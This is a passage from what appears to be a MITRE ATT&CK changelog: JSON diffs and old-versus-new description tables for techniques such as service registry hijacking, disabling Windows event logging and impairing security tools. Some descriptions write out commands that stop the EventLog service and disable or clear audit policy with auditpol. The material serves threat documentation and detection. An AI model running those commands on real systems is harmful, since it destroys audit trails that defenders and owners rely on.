is not already present and if an adversary-controlled user has the Create Subkey permission, adversaries may create the Performance key in the service\\u2019s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)\\n+\\n+Adversaries may also add the Parameters key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service\\u2019s file may be identified using HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\servicename\\\\Parameters\\\\ServiceDll.(Citation: malware_hides_service)\"}, \"root['external_references'][3]['source_name']\": {\"new_value\": \"malware_hides_service\", \"old_value\": \"Kansa Service related collectors\"}, \"root['external_references'][3]['description']\": {\"new_value\": \"Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021.\", \"old_value\": \"Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.\"}, \"root['external_references'][3]['url']\": {\"new_value\": \"https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/\", \"old_value\": \"https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html\"}, \"root['external_references'][4]['source_name']\": {\"new_value\": \"Kansa Service related collectors\", \"old_value\": \"Tweet Registry Perms Weakness\"}, \"root['external_references'][4]['description']\": {\"new_value\": \"Hull, D.. (2014, May 3). Kansa: Service related collectors and analysis. Retrieved October 10, 2019.\", \"old_value\": \"@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.\"}, \"root['external_references'][4]['url']\": {\"new_value\": \"https://trustedsignal.blogspot.com/2014/05/kansa-service-related-collectors-and.html\", \"old_value\": \"https://twitter.com/r0wdy_/status/936365549553991680\"}, \"root['external_references'][5]['source_name']\": {\"new_value\": \"Tweet Registry Perms Weakness\", \"old_value\": \"Autoruns for Windows\"}, \"root['external_references'][5]['description']\": {\"new_value\": \"@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved April 9, 2018.\", \"old_value\": \"Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020.\"}, \"root['external_references'][5]['url']\": {\"new_value\": \"https://twitter.com/r0wdy_/status/936365549553991680\", \"old_value\": \"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][6]\": {\"source_name\": \"microsoft_services_registry_tree\", \"description\": \"Microsoft. (2021, August 5). HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services Registry Tree. Retrieved August 25, 2021.\", \"url\": \"https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree\"}, \"root['external_references'][7]\": {\"source_name\": \"insecure_reg_perms\", \"description\": \"Cl\\u00e9ment Labro. (2020, November 12). Windows RpcEptMapper Service Insecure Registry Permissions EoP. Retrieved August 25, 2021.\", \"url\": \"https://itm4n.github.io/windows-registry-rpceptmapper-eop/\"}, \"root['external_references'][8]\": {\"source_name\": \"troj_zegost\", \"description\": \"Trend Micro. (2012, October 9). TROJ_ZEGOST. Retrieved September 2, 2021.\", \"url\": \"https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost\"}, \"root['external_references'][9]\": {\"source_name\": \"Autoruns for Windows\", \"description\": \"Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. Retrieved March 13, 2020.\", \"url\": \"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may execute their own malicious payloads by hija | t | 1 | Adversaries may execute their own malicious payloads by hija |
| > | cking the Registry entries used by services. Adversaries may | > | cking the Registry entries used by services. Adversaries may | ||
| > | use flaws in the permissions for registry to redirect from | > | use flaws in the permissions for Registry keys related to s | ||
| > | the originally specified executable to one that they control | > | ervices to redirect from the originally specified executable | ||
| > | , in order to launch their own code at Service start. Windo | > | to one that they control, in order to launch their own code | ||
| > | ws stores local service configuration information in the Reg | > | when a service starts. Windows stores local service configu | ||
| > | istry under <code>HKLM\\SYSTEM\\CurrentControlSet\\Services</co | > | ration information in the Registry under <code>HKLM\\SYSTEM\\C | ||
| > | de>. The information stored under a service's Registry keys | > | urrentControlSet\\Services</code>. The information stored und | ||
| > | can be manipulated to modify a service's execution parameter | > | er a service's Registry keys can be manipulated to modify a | ||
| > | s through tools such as the service controller, sc.exe, [Po | > | service's execution parameters through tools such as the ser | ||
| > | werShell](https://attack.mitre.org/techniques/T1059/001), or | > | vice controller, sc.exe, [PowerShell](https://attack.mitre. | ||
| > | [Reg](https://attack.mitre.org/software/S0075). Access to R | > | org/techniques/T1059/001), or [Reg](https://attack.mitre.org | ||
| > | egistry keys is controlled through Access Control Lists and | > | /software/S0075). Access to Registry keys is controlled thro | ||
| > | permissions. (Citation: Registry Key Security) If the permi | > | ugh access control lists and user permissions. (Citation: Re | ||
| > | ssions for users and groups are not properly set and allow a | > | gistry Key Security)(Citation: malware_hides_service) If th | ||
| > | ccess to the Registry keys for a service, then adversaries c | > | e permissions for users and groups are not properly set and | ||
| > | an change the service binPath/ImagePath to point to a differ | > | allow access to the Registry keys for a service, adversaries | ||
| > | ent executable under their control. When the service starts | > | may change the service's binPath/ImagePath to point to a di | ||
| > | or is restarted, then the adversary-controlled program will | > | fferent executable under their control. When the service sta | ||
| > | execute, allowing the adversary to gain persistence and/or p | > | rts or is restarted, then the adversary-controlled program w | ||
| > | rivilege escalation to the account context the service is se | > | ill execute, allowing the adversary to establish persistence | ||
| > | t to execute under (local/domain account, SYSTEM, LocalServi | > | and/or privilege escalation to the account context the serv | ||
| > | ce, or NetworkService). Adversaries may also alter Registry | > | ice is set to execute under (local/domain account, SYSTEM, L | ||
| > | keys associated with service failure parameters (such as <c | > | ocalService, or NetworkService). Adversaries may also alter | ||
| > | ode>FailureCommand</code>) that may be executed in an elevat | > | other Registry keys in the service\u2019s Registry tree. For exa | ||
| > | ed context anytime the service fails or is intentionally cor | > | mple, the <code>FailureCommand</code> key may be changed so | ||
| > | rupted.(Citation: Kansa Service related collectors)(Citation | > | that the service is executed in an elevated context anytime | ||
| > | : Tweet Registry Perms Weakness) | > | the service fails or is intentionally corrupted.(Citation: K | ||
| > | ansa Service related collectors)(Citation: Tweet Registry Pe | ||||
| > | rms Weakness) The <code>Performance</code> key contains the | ||||
| > | name of a driver service's performance DLL and the names of | ||||
| > | several exported functions in the DLL.(Citation: microsoft_ | ||||
| > | services_registry_tree) If the <code>Performance</code> key | ||||
| > | is not already present and if an adversary-controlled user h | ||||
| > | as the <code>Create Subkey</code> permission, adversaries ma | ||||
| > | y create the <code>Performance</code> key in the service\u2019s R | ||||
| > | egistry tree to point to a malicious DLL.(Citation: insecure | ||||
| > | _reg_perms) Adversaries may also add the <code>Parameters</ | ||||
| > | code> key, which stores driver-specific data, or other custo | ||||
| > | m subkeys for their malicious services to establish persiste | ||||
| > | nce or enable other malicious activities.(Citation: microsof | ||||
| > | t_services_registry_tree)(Citation: troj_zegost) Additionall | ||||
| > | y, If adversaries launch their malicious services using svch | ||||
| > | ost.exe, the service\u2019s file may be identified using <code>HK | ||||
| > | EY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\servicena | ||||
| > | me\\Parameters\\ServiceDll</code>.(Citation: malware_hides_ser | ||||
| > | vice) |
Security Settings\\Local Policies\\Audit Policy for basic audit policy settings or Security Settings\\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol)\n\nAdversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: Stop-Service -Name EventLog.(Citation: Disable_Win_Event_Logging) Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:\u201dAccount Logon\u201d /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco)\n\nBy disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1562/002",
"external_id": "T1562.002"
},
{
"source_name": "Windows Log Events",
"description": "Franklin Smith. (n.d.). Windows Security Log Events. Retrieved February 21, 2020.",
"url": "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/"
},
{
"source_name": "EventLog_Core_Technologies",
"description": "Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021.",
"url": "https://www.coretechnologies.com/blog/windows-services/eventlog/"
},
{
"source_name": "Audit_Policy_Microsoft",
"description": "Daniel Simpson. (2017, April 19). Audit Policy. Retrieved September 13, 2021.",
"url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy"
},
{
"source_name": "Advanced_sec_audit_policy_settings",
"description": "Simpson, D. et al. (2017, April 19). Advanced security audit policy settings. Retrieved September 14, 2021.",
"url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings"
},
{
"source_name": "auditpol",
"description": "Jason Gerend, et al. (2017, October 16). auditpol. Retrieved September 1, 2021.",
"url": "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol"
},
{
"source_name": "Disable_Win_Event_Logging",
"description": " dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021.",
"url": "https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging"
},
{
"source_name": "auditpol.exe_STRONTIC",
"description": "STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021.",
"url": "https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html"
},
{
"source_name": "T1562.002_redcanaryco",
"description": "redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021.",
"url": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"
},
{
"source_name": "def_ev_win_event_logging",
"description": "Chandel, R. (2021, April 22). Defense Evasion: Windows Event Logging (T1562.002). Retrieved September 14, 2021.",
"url": "https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/"
},
{
"source_name": "evt_log_tampering",
"description": "svch0st. (2020, September 30). Event Log Tampering Part 1: Disrupting the EventLog Service. Retrieved September 14, 2021.",
"url": "https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_contributors": [
"Prasanth Sadanala, Cigna Information Protection (CIP) - Threat Response Engineering Team"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Script: Script Execution",
"Windows Registry: Windows Registry Key Creation",
"Application Log: Application Log Content",
"Sensor Health: Host Status",
"Command: Command Execution"
],
"x_mitre_defense_bypassed": [
"Log analysis"
],
"x_mitre_detection": "Monitor processes and command-line arguments for commands that can be used to disable logging. For example, [Wevtutil](https://attack.mitre.org/software/S0645), `auditpol`, `sc stop EventLog`, and offensive tooling (such as [Mimikatz](https://attack.mitre.org/software/S0002) and `Invoke-Phant0m`) may be used to clear logs.(Citation: def_ev_win_event_logging)(Citation: evt_log_tampering) \n\nIn Event Viewer, Event ID 1102 under the \u201cSecurity\u201d Windows Log and Event ID 104 under the \u201cSystem\u201d Windows Log both indicate logs have been cleared.(Citation: def_ev_win_event_logging) `Service Control Manager Event ID 7035` in Event Viewer may indicate the termination of the EventLog service.(Citation: evt_log_tampering) Additionally, gaps in the logs, e.g. non-sequential Event Record IDs, may indicate that the logs may have been tampered.\n\nMonitor the addition of the MiniNT registry key in `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control`, which may disable Event Viewer.(Citation: def_ev_win_event_logging)",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_contributors']\": [\"Prasanth Sadanala, Cigna Information Protection (CIP) - Threat Response Engineering Team\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-19 13:37:30.534000+00:00\", \"old_value\": \"2020-03-29 22:02:33.870000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.\\n\\nThe EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\\\\Local Policies\\\\Audit Policy for basic audit policy settings or Security Settings\\\\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol)\\n\\nAdversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: Stop-Service -Name EventLog.(Citation: Disable_Win_Event_Logging) Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:\\u201dAccount Logon\\u201d /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco)\\n\\nBy disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.\", \"old_value\": \"Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.\\n\\nAdversaries may targeting system-wide logging or just that of a particular application. By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,7 @@\\n Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.\\n \\n-Adversaries may targeting system-wide logging or just that of a particular application. By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.\\n+The EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\\\\Local Policies\\\\Audit Policy for basic audit policy settings or Security Settings\\\\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol)\\n+\\n+Adversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: Stop-Service -Name EventLog.(Citation: Disable_Win_Event_Logging) Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:\\u201dAccount Logon\\u201d /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco)\\n+\\n+By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Monitor processes and command-line arguments for commands that can be used to disable logging. For example, [Wevtutil](https://attack.mitre.org/software/S0645), `auditpol`, `sc stop EventLog`, and offensive tooling (such as [Mimikatz](https://attack.mitre.org/software/S0002) and `Invoke-Phant0m`) may be used to clear logs.(Citation: def_ev_win_event_logging)(Citation: evt_log_tampering) \\n\\nIn Event Viewer, Event ID 1102 under the \\u201cSecurity\\u201d Windows Log and Event ID 104 under the \\u201cSystem\\u201d Windows Log both indicate logs have been cleared.(Citation: def_ev_win_event_logging) `Service Control Manager Event ID 7035` in Event Viewer may indicate the termination of the EventLog service.(Citation: evt_log_tampering) Additionally, gaps in the logs, e.g. non-sequential Event Record IDs, may indicate that the logs may have been tampered.\\n\\nMonitor the addition of the MiniNT registry key in `HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control`, which may disable Event Viewer.(Citation: def_ev_win_event_logging)\", \"old_value\": \"Monitor processes and command-line arguments for commands that can be used to disable logging. Lack of event logs may be suspicious.\", \"diff\": \"--- \\n+++ \\n@@ -1 +1,5 @@\\n-Monitor processes and command-line arguments for commands that can be used to disable logging. Lack of event logs may be suspicious.\\n+Monitor processes and command-line arguments for commands that can be used to disable logging. For example, [Wevtutil](https://attack.mitre.org/software/S0645), `auditpol`, `sc stop EventLog`, and offensive tooling (such as [Mimikatz](https://attack.mitre.org/software/S0002) and `Invoke-Phant0m`) may be used to clear logs.(Citation: def_ev_win_event_logging)(Citation: evt_log_tampering) \\n+\\n+In Event Viewer, Event ID 1102 under the \\u201cSecurity\\u201d Windows Log and Event ID 104 under the \\u201cSystem\\u201d Windows Log both indicate logs have been cleared.(Citation: def_ev_win_event_logging) `Service Control Manager Event ID 7035` in Event Viewer may indicate the termination of the EventLog service.(Citation: evt_log_tampering) Additionally, gaps in the logs, e.g. non-sequential Event Record IDs, may indicate that the logs may have been tampered.\\n+\\n+Monitor the addition of the MiniNT registry key in `HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control`, which may disable Event Viewer.(Citation: def_ev_win_event_logging)\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][2]\": {\"source_name\": \"EventLog_Core_Technologies\", \"description\": \"Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021.\", \"url\": \"https://www.coretechnologies.com/blog/windows-services/eventlog/\"}, \"root['external_references'][3]\": {\"source_name\": \"Audit_Policy_Microsoft\", \"description\": \"Daniel Simpson. (2017, April 19). Audit Policy. Retrieved September 13, 2021.\", \"url\": \"https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy\"}, \"root['external_references'][4]\": {\"source_name\": \"Advanced_sec_audit_policy_settings\", \"description\": \"Simpson, D. et al. (2017, April 19). Advanced security audit policy settings. Retrieved September 14, 2021.\", \"url\": \"https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings\"}, \"root['external_references'][5]\": {\"source_name\": \"auditpol\", \"description\": \"Jason Gerend, et al. (2017, October 16). auditpol. Retrieved September 1, 2021.\", \"url\": \"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol\"}, \"root['external_references'][6]\": {\"source_name\": \"Disable_Win_Event_Logging\", \"description\": \" dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021.\", \"url\": \"https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging\"}, \"root['external_references'][7]\": {\"source_name\": \"auditpol.exe_STRONTIC\", \"description\": \"STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021.\", \"url\": \"https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html\"}, \"root['external_references'][8]\": {\"source_name\": \"T1562.002_redcanaryco\", \"description\": \"redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021.\", \"url\": \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md\"}, \"root['external_references'][9]\": {\"source_name\": \"def_ev_win_event_logging\", \"description\": \"Chandel, R. (2021, April 22). Defense Evasion: Windows Event Logging (T1562.002). Retrieved September 14, 2021.\", \"url\": \"https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/\"}, \"root['external_references'][10]\": {\"source_name\": \"evt_log_tampering\", \"description\": \"svch0st. (2020, September 30). Event Log Tampering Part 1: Disrupting the EventLog Service. Retrieved September 14, 2021.\", \"url\": \"https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c\"}, \"root['x_mitre_data_sources'][0]\": \"Process: Process Creation\", \"root['x_mitre_data_sources'][1]\": \"Script: Script Execution\", \"root['x_mitre_data_sources'][2]\": \"Windows Registry: Windows Registry Key Creation\", \"root['x_mitre_data_sources'][3]\": \"Application Log: Application Log Content\"}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may disable Windows event logging to limit data | t | 1 | Adversaries may disable Windows event logging to limit data |
| > | that can be leveraged for detections and audits. Windows eve | > | that can be leveraged for detections and audits. Windows eve | ||
| > | nt logs record user and system activity such as login attemp | > | nt logs record user and system activity such as login attemp | ||
| > | ts, process creation, and much more.(Citation: Windows Log E | > | ts, process creation, and much more.(Citation: Windows Log E | ||
| > | vents) This data is used by security tools and analysts to g | > | vents) This data is used by security tools and analysts to g | ||
| > | enerate detections. Adversaries may targeting system-wide l | > | enerate detections. The EventLog service maintains event lo | ||
| > | ogging or just that of a particular application. By disablin | > | gs from various system components and applications.(Citation | ||
| > | g Windows event logging, adversaries can operate while leavi | > | : EventLog_Core_Technologies) By default, the service automa | ||
| > | ng less evidence of a compromise behind. | > | tically starts when a system powers on. An audit policy, mai | ||
| > | ntained by the Local Security Policy (secpol.msc), defines w | ||||
| > | hich system events the EventLog service logs. Security audit | ||||
| > | policy settings can be changed by running secpol.msc, then | ||||
| > | navigating to <code>Security Settings\\Local Policies\\Audit P | ||||
| > | olicy</code> for basic audit policy settings or <code>Securi | ||||
| > | ty Settings\\Advanced Audit Policy Configuration</code> for a | ||||
| > | dvanced audit policy settings.(Citation: Audit_Policy_Micros | ||||
| > | oft)(Citation: Advanced_sec_audit_policy_settings) <code>aud | ||||
| > | itpol.exe</code> may also be used to set audit policies.(Cit | ||||
| > | ation: auditpol) Adversaries may target system-wide logging | ||||
| > | or just that of a particular application. For example, the | ||||
| > | EventLog service may be disabled using the following PowerSh | ||||
| > | ell line: <code>Stop-Service -Name EventLog</code>.(Citation | ||||
| > | : Disable_Win_Event_Logging) Additionally, adversaries may u | ||||
| > | se <code>auditpol</code> and its sub-commands in a command p | ||||
| > | rompt to disable auditing or clear the audit policy. To enab | ||||
| > | le or disable a specified setting or audit category, adversa | ||||
| > | ries may use the <code>/success</code> or <code>/failure</co | ||||
| > | de> parameters. For example, <code>auditpol /set /category:\u201d | ||||
| > | Account Logon\u201d /success:disable /failure:disable</code> turn | ||||
| > | s off auditing for the Account Logon category.(Citation: aud | ||||
| > | itpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clea | ||||
| > | r the audit policy, adversaries may run the following lines: | ||||
| > | <code>auditpol /clear /y</code> or <code>auditpol /remove / | ||||
| > | allusers</code>.(Citation: T1562.002_redcanaryco) By disabl | ||||
| > | ing Windows event logging, adversaries can operate while lea | ||||
| > | ving less evidence of a compromise behind. |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may disable security tools to avoid possible det | t | 1 | Adversaries may modify and/or disable security tools to avoi |
| > | ection of their tools and activities. This can take the form | > | d possible detection of their malware/tools and activities. | ||
| > | of killing security software or event logging processes, de | > | This may take the many forms, such as killing security softw | ||
| > | leting Registry keys so that tools do not start at run time, | > | are processes or services, modifying / deleting Registry key | ||
| > | or other methods to interfere with security tools scanning | > | s or configuration files so that tools do not operate proper | ||
| > | or reporting information. | > | ly, or other methods to interfere with security tools scanni | ||
| > | ng or reporting information. Adversaries may also tamper wi | ||||
| > | th artifacts deployed and utilized by security tools. Securi | ||||
| > | ty tools may make dynamic changes to system components in or | ||||
| > | der to maintain visibility into specific events. For example | ||||
| > | , security products may load their own modules and/or modify | ||||
| > | those loaded by processes to facilitate data collection. Si | ||||
| > | milar to [Indicator Blocking](https://attack.mitre.org/techn | ||||
| > | iques/T1562/006), adversaries may unhook or otherwise modify | ||||
| > | these features added by tools (especially those that exist | ||||
| > | in userland or are otherwise potentially accessible to adver | ||||
| > | saries) to avoid detection.(Citation: OutFlank System Calls) | ||||
| > | (Citation: MDSec System Calls) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may mimic common operating system GUI components | t | 1 | Adversaries may mimic common operating system GUI components |
| > | to prompt users for credentials with a seemingly legitimate | > | to prompt users for credentials with a seemingly legitimate | ||
| > | prompt. When programs are executed that need additional pri | > | prompt. When programs are executed that need additional pri | ||
| > | vileges than are present in the current user context, it is | > | vileges than are present in the current user context, it is | ||
| > | common for the operating system to prompt the user for prope | > | common for the operating system to prompt the user for prope | ||
| > | r credentials to authorize the elevated privileges for the t | > | r credentials to authorize the elevated privileges for the t | ||
| > | ask (ex: [Bypass User Account Control](https://attack.mitre. | > | ask (ex: [Bypass User Account Control](https://attack.mitre. | ||
| > | org/techniques/T1548/002)). Adversaries may mimic this func | > | org/techniques/T1548/002)). Adversaries may mimic this func | ||
| > | tionality to prompt users for credentials with a seemingly l | > | tionality to prompt users for credentials with a seemingly l | ||
| > | egitimate prompt for a number of reasons that mimic normal u | > | egitimate prompt for a number of reasons that mimic normal u | ||
| > | sage, such as a fake installer requiring additional access o | > | sage, such as a fake installer requiring additional access o | ||
| > | r a fake malware removal suite.(Citation: OSX Malware Exploi | > | r a fake malware removal suite.(Citation: OSX Malware Exploi | ||
| > | ts MacKeeper) This type of prompt can be used to collect cre | > | ts MacKeeper) This type of prompt can be used to collect cre | ||
| > | dentials via various languages such as AppleScript(Citation: | > | dentials via various languages such as [AppleScript](https:/ | ||
| > | LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malw | > | /attack.mitre.org/techniques/T1059/002)(Citation: LogRhythm | ||
| > | are) and PowerShell(Citation: LogRhythm Do You Trust Oct 201 | > | Do You Trust Oct 2014)(Citation: OSX Keydnap malware)(Citati | ||
| > | 4)(Citation: Enigma Phishing for Credentials Jan 2015). | > | on: Spoofing credential dialogs) and [PowerShell](https://at | ||
| > | tack.mitre.org/techniques/T1059/001).(Citation: LogRhythm Do | ||||
| > | You Trust Oct 2014)(Citation: Enigma Phishing for Credentia | ||||
| > | ls Jan 2015)(Citation: Spoofing credential dialogs) On Linux | ||||
| > | systems attackers may launch dialog boxes prompting users f | ||||
| > | or credentials from malicious shell scripts or the command l | ||||
| > | ine (i.e. [Unix Shell](https://attack.mitre.org/techniques/T | ||||
| > | 1059/004)).(Citation: Spoofing credential dialogs) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may abuse inter-process communication (IPC) mech | t | 1 | Adversaries may abuse inter-process communication (IPC) mech |
| > | anisms for local code or command execution. IPC is typically | > | anisms for local code or command execution. IPC is typically | ||
| > | used by processes to share data, communicate with each othe | > | used by processes to share data, communicate with each othe | ||
| > | r, or synchronize execution. IPC is also commonly used to av | > | r, or synchronize execution. IPC is also commonly used to av | ||
| > | oid situations such as deadlocks, which occurs when processe | > | oid situations such as deadlocks, which occurs when processe | ||
| > | s are stuck in a cyclic waiting pattern. Adversaries may a | > | s are stuck in a cyclic waiting pattern. Adversaries may a | ||
| > | buse IPC to execute arbitrary code or commands. IPC mechanis | > | buse IPC to execute arbitrary code or commands. IPC mechanis | ||
| > | ms may differ depending on OS, but typically exists in a for | > | ms may differ depending on OS, but typically exists in a for | ||
| > | m accessible through programming languages/libraries or nati | > | m accessible through programming languages/libraries or nati | ||
| > | ve interfaces such as Windows [Dynamic Data Exchange](https: | > | ve interfaces such as Windows [Dynamic Data Exchange](https: | ||
| > | //attack.mitre.org/techniques/T1559/002) or [Component Objec | > | //attack.mitre.org/techniques/T1559/002) or [Component Objec | ||
| > | t Model](https://attack.mitre.org/techniques/T1559/001). Hig | > | t Model](https://attack.mitre.org/techniques/T1559/001). Hig | ||
| > | her level execution mediums, such as those of [Command and S | > | her level execution mediums, such as those of [Command and S | ||
| > | cripting Interpreter](https://attack.mitre.org/techniques/T1 | > | cripting Interpreter](https://attack.mitre.org/techniques/T1 | ||
| > | 059)s, may also leverage underlying IPC mechanisms. | > | 059)s, may also leverage underlying IPC mechanisms. Adversar | ||
| > | ies may also use [Remote Services](https://attack.mitre.org/ | ||||
| > | techniques/T1021) such as [Distributed Component Object Mode | ||||
| > | l](https://attack.mitre.org/techniques/T1021/003) to facilit | ||||
| > | ate remote IPC execution.(Citation: Fireeye Hunting COM June | ||||
| > | 2019) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may use the Windows Component Object Model (COM) | t | 1 | Adversaries may use the Windows Component Object Model (COM) |
